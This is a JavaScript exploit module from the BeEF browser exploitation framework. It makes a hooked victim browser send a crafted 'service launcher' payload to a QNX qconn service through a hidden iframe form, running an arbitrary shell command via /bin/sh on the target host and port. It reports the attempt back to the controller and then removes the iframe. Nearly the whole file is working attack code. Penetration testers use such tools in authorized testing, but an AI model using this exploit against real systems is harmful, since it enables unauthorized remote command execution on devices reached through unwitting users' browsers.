beef/modules/exploits/qnx_qconn_command_execution/command.js

//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	var rhost   = '<%= @rhost %>'; 
	var rport   = '<%= @rport %>';
	var timeout = '<%= @timeout %>';

	// validate payload
	try {
		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
		var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'
	} catch(e) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
		return;
	}

	// validate target details
	if (!rport || !rhost || isNaN(rport)) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
		return;
	}
	if (rport > 65535 || rport < 0) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
		return;
	}

	// send commands
	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(qnx_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});